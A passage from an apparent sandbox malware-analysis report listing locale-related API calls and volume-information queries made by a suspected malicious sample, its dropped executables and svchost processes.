__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	3_2_00007FF699AC84B4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: EnumSystemLocalesEx,	3_2_00007FF699AC6430
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	3_2_00007FF699AC9830
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	3_2_00007FF699AC77A0
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	4_2_00007FF7537084B4
Source: C:\Windows\System32\svchost.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	4_2_00007FF75370406C
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	4_2_00007FF75370ACD8
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesEx,	4_2_00007FF753706430
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	4_2_00007FF753709830
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,	4_2_00007FF75370972C
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	4_2_00007FF7537077A0
Source: C:\Windows\System32\svchost.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_00007FF75370AE34
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	4_2_00007FF753709678
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	4_2_00007FF7536FBEB4
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	4_2_00007FF753707D2C
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	4_2_00007FF75370920C
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	7_2_00007FF736B677A0
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,	7_2_00007FF736B6972C
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	7_2_00007FF736B6ACD8
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	7_2_00007FF736B684B4
Source: C:\Windows\System32\svchost.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	7_2_00007FF736B6406C
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesEx,	7_2_00007FF736B66430
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	7_2_00007FF736B69830
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	7_2_00007FF736B6920C
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	7_2_00007FF736B67D2C
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	7_2_00007FF736B5BEB4
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	7_2_00007FF736B69678
Source: C:\Windows\System32\svchost.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_00007FF736B6AE34
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: EnumSystemLocalesW,	11_2_00007FFE0133F35C
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetPrimaryLen,EnumSystemLocalesW,	11_2_00007FFE0133F3C4
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,	11_2_00007FFE0133D2E0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetPrimaryLen,EnumSystemLocalesW,	11_2_00007FFE0133F478
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_00007FFE0133F8C0
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetProcAddress,GetLocaleInfoW,	11_2_00007FFE012EDC20
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_00007FFE0133FA48
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,	13_2_00007FF7F4E8920C
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,	13_2_00007FF7F4E87D2C
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,	13_2_00007FF7F4E7BEB4
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	13_2_00007FF7F4E89678
Source: C:\Windows\System32\svchost.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	13_2_00007FF7F4E8AE34
Source: C:\Windows\System32\svchost.exe	Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,	13_2_00007FF7F4E877A0
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,	13_2_00007FF7F4E8972C
Source: C:\Windows\System32\svchost.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte,	13_2_00007FF7F4E8ACD8
Source: C:\Windows\System32\svchost.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	13_2_00007FF7F4E884B4
Source: C:\Windows\System32\svchost.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson,	13_2_00007FF7F4E8406C
Source: C:\Windows\System32\svchost.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,	13_2_00007FF7F4E89830
Source: C:\Windows\System32\svchost.exe	Code function: EnumSystemLocalesEx,	13_2_00007FF7F4E86430

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-console-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\api-ms-win-core-file-l1-2-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A91B.tmp.zx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77402\base_library.zip VolumeInformation	Jump to behavior
